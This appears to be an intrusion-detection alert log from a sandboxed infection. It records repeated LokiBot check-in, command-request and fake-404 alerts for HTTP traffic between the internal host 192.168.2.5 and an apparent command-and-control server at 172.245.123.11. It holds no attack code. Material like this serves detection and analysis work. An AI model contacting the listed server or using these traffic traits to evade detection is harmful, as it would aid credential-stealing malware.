2025-01-07T11:02:51.916359+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50015	172.245.123.11	80	TCP
2025-01-07T11:02:51.916359+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50015	172.245.123.11	80	TCP
2025-01-07T11:02:51.916359+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50015	172.245.123.11	80	TCP
2025-01-07T11:02:52.460403+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50015	172.245.123.11	80	TCP
2025-01-07T11:02:52.460403+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50015	172.245.123.11	80	TCP
2025-01-07T11:02:52.460410+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50015	TCP
2025-01-07T11:02:52.618644+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50020	172.245.123.11	80	TCP
2025-01-07T11:02:52.618644+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50020	172.245.123.11	80	TCP
2025-01-07T11:02:52.618644+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50020	172.245.123.11	80	TCP
2025-01-07T11:02:53.129836+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50020	172.245.123.11	80	TCP
2025-01-07T11:02:53.129836+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50020	172.245.123.11	80	TCP
2025-01-07T11:02:53.129904+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50020	TCP
2025-01-07T11:02:53.273172+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50026	172.245.123.11	80	TCP
2025-01-07T11:02:53.273172+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50026	172.245.123.11	80	TCP
2025-01-07T11:02:53.273172+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50026	172.245.123.11	80	TCP
2025-01-07T11:02:53.777572+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50026	172.245.123.11	80	TCP
2025-01-07T11:02:53.777572+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50026	172.245.123.11	80	TCP
2025-01-07T11:02:53.782384+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50026	TCP
2025-01-07T11:02:53.936803+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50032	172.245.123.11	80	TCP
2025-01-07T11:02:53.936803+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50032	172.245.123.11	80	TCP
2025-01-07T11:02:53.936803+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50032	172.245.123.11	80	TCP
2025-01-07T11:02:54.694689+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50032	172.245.123.11	80	TCP
2025-01-07T11:02:54.694689+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50032	172.245.123.11	80	TCP
2025-01-07T11:02:54.695350+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50032	TCP
2025-01-07T11:02:55.171759+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50038	172.245.123.11	80	TCP
2025-01-07T11:02:55.171759+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50038	172.245.123.11	80	TCP
2025-01-07T11:02:55.171759+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50038	172.245.123.11	80	TCP
2025-01-07T11:02:55.670454+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50038	172.245.123.11	80	TCP
2025-01-07T11:02:55.670454+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50038	172.245.123.11	80	TCP
2025-01-07T11:02:55.675259+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50038	TCP
2025-01-07T11:02:55.829665+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50044	172.245.123.11	80	TCP
2025-01-07T11:02:55.829665+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50044	172.245.123.11	80	TCP
2025-01-07T11:02:55.829665+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50044	172.245.123.11	80	TCP
2025-01-07T11:02:56.381416+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50044	172.245.123.11	80	TCP
2025-01-07T11:02:56.381416+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50044	172.245.123.11	80	TCP
2025-01-07T11:02:56.386259+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50044	TCP
2025-01-07T11:02:56.557892+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50050	172.245.123.11	80	TCP
2025-01-07T11:02:56.557892+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50050	172.245.123.11	80	TCP
2025-01-07T11:02:56.557892+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50050	172.245.123.11	80	TCP
2025-01-07T11:02:57.059679+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50050	172.245.123.11	80	TCP
2025-01-07T11:02:57.059679+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50050	172.245.123.11	80	TCP
2025-01-07T11:02:57.059724+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50050	TCP
2025-01-07T11:02:57.234366+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50055	172.245.123.11	80	TCP
2025-01-07T11:02:57.234366+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50055	172.245.123.11	80	TCP
2025-01-07T11:02:57.234366+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50055	172.245.123.11	80	TCP
2025-01-07T11:02:57.747009+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50055	172.245.123.11	80	TCP
2025-01-07T11:02:57.747009+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50055	172.245.123.11	80	TCP
2025-01-07T11:02:57.747262+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50055	TCP
2025-01-07T11:02:57.904891+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50061	172.245.123.11	80	TCP
2025-01-07T11:02:57.904891+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50061	172.245.123.11	80	TCP
2025-01-07T11:02:57.904891+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50061	172.245.123.11	80	TCP
2025-01-07T11:02:58.413612+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50061	172.245.123.11	80	TCP
2025-01-07T11:02:58.413612+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50061	172.245.123.11	80	TCP
2025-01-07T11:02:58.413629+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50061	TCP
2025-01-07T11:02:58.574189+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50066	172.245.123.11	80	TCP
2025-01-07T11:02:58.574189+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50066	172.245.123.11	80	TCP
2025-01-07T11:02:58.574189+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50066	172.245.123.11	80	TCP
2025-01-07T11:02:59.073831+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50066	172.245.123.11	80	TCP
2025-01-07T11:02:59.073831+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50066	172.245.123.11	80	TCP
2025-01-07T11:02:59.073850+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50066	TCP
2025-01-07T11:02:59.229112+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50067	172.245.123.11	80	TCP
2025-01-07T11:02:59.229112+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50067	172.245.123.11	80	TCP
2025-01-07T11:02:59.229112+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50067	172.245.123.11	80	TCP
2025-01-07T11:02:59.743774+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50067	172.245.123.11	80	TCP
2025-01-07T11:02:59.743774+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50067	172.245.123.11	80	TCP
2025-01-07T11:02:59.744118+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50067	TCP
2025-01-07T11:02:59.900572+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50068	172.245.123.11	80	TCP
2025-01-07T11:02:59.900572+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50068	172.245.123.11	80	TCP
2025-01-07T11:02:59.900572+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50068	172.245.123.11	80	TCP
2025-01-07T11:03:00.408178+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50068	172.245.123.11	80	TCP
2025-01-07T11:03:00.408178+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50068	172.245.123.11	80	TCP
2025-01-07T11:03:00.408286+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50068	TCP
2025-01-07T11:03:00.558517+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50069	172.245.123.11	80	TCP
2025-01-07T11:03:00.558517+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50069	172.245.123.11	80	TCP
2025-01-07T11:03:00.558517+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50069	172.245.123.11	80	TCP
2025-01-07T11:03:01.053021+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50069	172.245.123.11	80	TCP
2025-01-07T11:03:01.053021+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50069	172.245.123.11	80	TCP
2025-01-07T11:03:01.060718+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50069	TCP
2025-01-07T11:03:01.212085+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50070	172.245.123.11	80	TCP
2025-01-07T11:03:01.212085+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50070	172.245.123.11	80	TCP
2025-01-07T11:03:01.212085+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50070	172.245.123.11	80	TCP
2025-01-07T11:03:01.734889+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50070	172.245.123.11	80	TCP
2025-01-07T11:03:01.734889+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50070	172.245.123.11	80	TCP
2025-01-07T11:03:01.746358+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50070	TCP
2025-01-07T11:03:01.900649+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50071	172.245.123.11	80	TCP
2025-01-07T11:03:01.900649+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50071	172.245.123.11	80	TCP
2025-01-07T11:03:01.900649+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50071	172.245.123.11	80	TCP
2025-01-07T11:03:02.402684+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50071	172.245.123.11	80	TCP
2025-01-07T11:03:02.402684+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50071	172.245.123.11	80	TCP
2025-01-07T11:03:02.419565+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50071	TCP
2025-01-07T11:03:02.675531+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50072	172.245.123.11	80	TCP
2025-01-07T11:03:02.675531+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50072	172.245.123.11	80	TCP
2025-01-07T11:03:02.675531+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50072	172.245.123.11	80	TCP
2025-01-07T11:03:03.187911+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50072	172.245.123.11	80	TCP
2025-01-07T11:03:03.187911+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50072	172.245.123.11	80	TCP
2025-01-07T11:03:03.192775+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50072	TCP
2025-01-07T11:03:03.337291+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50073	172.245.123.11	80	TCP
2025-01-07T11:03:03.337291+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50073	172.245.123.11	80	TCP
2025-01-07T11:03:03.337291+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50073	172.245.123.11	80	TCP
2025-01-07T11:03:03.861850+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50073	172.245.123.11	80	TCP
2025-01-07T11:03:03.861850+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50073	172.245.123.11	80	TCP
2025-01-07T11:03:03.866629+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50073	TCP
2025-01-07T11:03:04.013533+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50074	172.245.123.11	80	TCP
2025-01-07T11:03:04.013533+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50074	172.245.123.11	80	TCP
2025-01-07T11:03:04.013533+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50074	172.245.123.11	80	TCP
2025-01-07T11:03:04.533061+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50074	172.245.123.11	80	TCP
2025-01-07T11:03:04.533061+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50074	172.245.123.11	80	TCP
2025-01-07T11:03:04.533080+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50074	TCP
2025-01-07T11:03:04.679878+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50075	172.245.123.11	80	TCP
2025-01-07T11:03:04.679878+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50075	172.245.123.11	80	TCP
2025-01-07T11:03:04.679878+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50075	172.245.123.11	80	TCP
2025-01-07T11:03:05.175668+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50075	172.245.123.11	80	TCP
2025-01-07T11:03:05.175668+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50075	172.245.123.11	80	TCP
2025-01-07T11:03:05.175810+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50075	TCP
2025-01-07T11:03:05.319446+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50076	172.245.123.11	80	TCP
2025-01-07T11:03:05.319446+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50076	172.245.123.11	80	TCP
2025-01-07T11:03:05.319446+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50076	172.245.123.11	80	TCP
2025-01-07T11:03:05.822128+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50076	172.245.123.11	80	TCP
2025-01-07T11:03:05.822128+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50076	172.245.123.11	80	TCP
2025-01-07T11:03:05.822165+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50076	TCP
2025-01-07T11:03:05.975970+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50077	172.245.123.11	80	TCP
2025-01-07T11:03:05.975970+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50077	172.245.123.11	80	TCP
2025-01-07T11:03:05.975970+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50077	172.245.123.11	80	TCP
2025-01-07T11:03:06.488704+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50077	172.245.123.11	80	TCP
2025-01-07T11:03:06.488704+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50077	172.245.123.11	80	TCP
2025-01-07T11:03:06.488803+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50077	TCP
2025-01-07T11:03:06.639844+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50078	172.245.123.11	80	TCP
2025-01-07T11:03:06.639844+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50078	172.245.123.11	80	TCP
2025-01-07T11:03:06.639844+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50078	172.245.123.11	80	TCP
2025-01-07T11:03:07.161033+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50078	172.245.123.11	80	TCP
2025-01-07T11:03:07.161033+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50078	172.245.123.11	80	TCP
2025-01-07T11:03:07.165978+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50078	TCP
2025-01-07T11:03:07.327650+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50079	172.245.123.11	80	TCP
2025-01-07T11:03:07.327650+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50079	172.245.123.11	80	TCP
2025-01-07T11:03:07.327650+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50079	172.245.123.11	80	TCP
2025-01-07T11:03:07.986400+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50079	172.245.123.11	80	TCP
2025-01-07T11:03:07.986400+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50079	172.245.123.11	80	TCP
2025-01-07T11:03:07.991205+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50079	TCP
2025-01-07T11:03:08.132275+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50080	172.245.123.11	80	TCP
2025-01-07T11:03:08.132275+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50080	172.245.123.11	80	TCP
2025-01-07T11:03:08.132275+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50080	172.245.123.11	80	TCP
2025-01-07T11:03:08.655207+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50080	172.245.123.11	80	TCP
2025-01-07T11:03:08.655207+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50080	172.245.123.11	80	TCP
2025-01-07T11:03:08.660237+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50080	TCP
2025-01-07T11:03:08.806380+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50081	172.245.123.11	80	TCP
2025-01-07T11:03:08.806380+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50081	172.245.123.11	80	TCP
2025-01-07T11:03:08.806380+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50081	172.245.123.11	80	TCP
2025-01-07T11:03:09.305924+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50081	172.245.123.11	80	TCP
2025-01-07T11:03:09.305924+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50081	172.245.123.11	80	TCP
2025-01-07T11:03:09.310820+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50081	TCP
2025-01-07T11:03:09.459976+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50082	172.245.123.11	80	TCP
2025-01-07T11:03:09.459976+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50082	172.245.123.11	80	TCP
2025-01-07T11:03:09.459976+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50082	172.245.123.11	80	TCP
2025-01-07T11:03:09.979695+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50082	172.245.123.11	80	TCP
2025-01-07T11:03:09.979695+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50082	172.245.123.11	80	TCP
2025-01-07T11:03:09.979775+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50082	TCP
2025-01-07T11:03:10.132210+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50083	172.245.123.11	80	TCP
2025-01-07T11:03:10.132210+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50083	172.245.123.11	80	TCP
2025-01-07T11:03:10.132210+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50083	172.245.123.11	80	TCP
2025-01-07T11:03:10.638606+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50083	172.245.123.11	80	TCP
2025-01-07T11:03:10.638606+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50083	172.245.123.11	80	TCP
2025-01-07T11:03:10.638618+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50083	TCP
2025-01-07T11:03:10.788630+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50084	172.245.123.11	80	TCP
2025-01-07T11:03:10.788630+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50084	172.245.123.11	80	TCP
2025-01-07T11:03:10.788630+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50084	172.245.123.11	80	TCP
2025-01-07T11:03:11.312133+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50084	172.245.123.11	80	TCP
2025-01-07T11:03:11.312133+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50084	172.245.123.11	80	TCP
2025-01-07T11:03:11.312316+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50084	TCP
2025-01-07T11:03:11.460089+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50085	172.245.123.11	80	TCP
2025-01-07T11:03:11.460089+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50085	172.245.123.11	80	TCP
2025-01-07T11:03:11.460089+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50085	172.245.123.11	80	TCP
2025-01-07T11:03:11.962130+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50085	172.245.123.11	80	TCP
2025-01-07T11:03:11.962130+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50085	172.245.123.11	80	TCP
2025-01-07T11:03:11.962187+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50085	TCP
2025-01-07T11:03:12.127099+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50086	172.245.123.11	80	TCP
2025-01-07T11:03:12.127099+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50086	172.245.123.11	80	TCP
2025-01-07T11:03:12.127099+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50086	172.245.123.11	80	TCP
2025-01-07T11:03:12.613769+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50086	172.245.123.11	80	TCP
2025-01-07T11:03:12.613769+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50086	172.245.123.11	80	TCP
2025-01-07T11:03:12.618552+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50086	TCP
2025-01-07T11:03:12.756187+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50087	172.245.123.11	80	TCP
2025-01-07T11:03:12.756187+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50087	172.245.123.11	80	TCP
2025-01-07T11:03:12.756187+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50087	172.245.123.11	80	TCP
2025-01-07T11:03:13.254814+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50087	172.245.123.11	80	TCP
2025-01-07T11:03:13.254814+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50087	172.245.123.11	80	TCP
2025-01-07T11:03:13.259632+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50087	TCP
2025-01-07T11:03:13.399253+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50088	172.245.123.11	80	TCP
2025-01-07T11:03:13.399253+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50088	172.245.123.11	80	TCP
2025-01-07T11:03:13.399253+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50088	172.245.123.11	80	TCP
2025-01-07T11:03:13.969827+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50088	172.245.123.11	80	TCP
2025-01-07T11:03:13.969827+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50088	172.245.123.11	80	TCP
2025-01-07T11:03:13.969885+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50088	TCP
2025-01-07T11:03:14.117177+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50089	172.245.123.11	80	TCP
2025-01-07T11:03:14.117177+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50089	172.245.123.11	80	TCP
2025-01-07T11:03:14.117177+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50089	172.245.123.11	80	TCP
2025-01-07T11:03:14.623238+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50089	172.245.123.11	80	TCP
2025-01-07T11:03:14.623238+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50089	172.245.123.11	80	TCP
2025-01-07T11:03:14.627975+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	172.245.123.11	80	192.168.2.5	50089	TCP
2025-01-07T11:03:14.771734+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50090	172.245.123.11	80	TCP
2025-01-07T11:03:14.771734+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50090	172.245.123.11	80	TCP
2025-01-07T11:03:14.771734+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50090	172.245.123.11	80	TCP
2025-01-07T11:03:15.287763+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50090	172.245.123.11	80	TCP
2025-01-07T11:03:15.287763+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50090	172.245.123.11	80	TCP
